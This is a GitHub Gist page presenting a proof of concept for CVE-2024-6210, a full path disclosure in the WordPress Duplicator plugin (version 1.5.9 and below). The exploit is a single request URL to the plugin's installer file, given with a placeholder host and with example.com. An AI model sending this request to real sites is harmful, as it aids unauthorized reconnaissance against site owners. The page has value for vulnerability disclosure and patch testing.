Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Select an option

  • Save h0ffy/60c3c441e90e8a37208f532bae832867 to your computer and use it in GitHub Desktop.

Select an option

Save h0ffy/60c3c441e90e8a37208f532bae832867 to your computer and use it in GitHub Desktop.

WordPress Exploit CVE-2024-6210 Full Path Disclosured

Vulnerability

Duplicator <= 1.5.9 - Full Path Disclosure (CVE-2024-6210)

Exploit

https://$URL/wp-content/plugins/duplicator/installer/dup-installer/main.installer.php
https://example.com/wp-content/plugins/duplicator/installer/dup-installer/main.installer.php

References

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment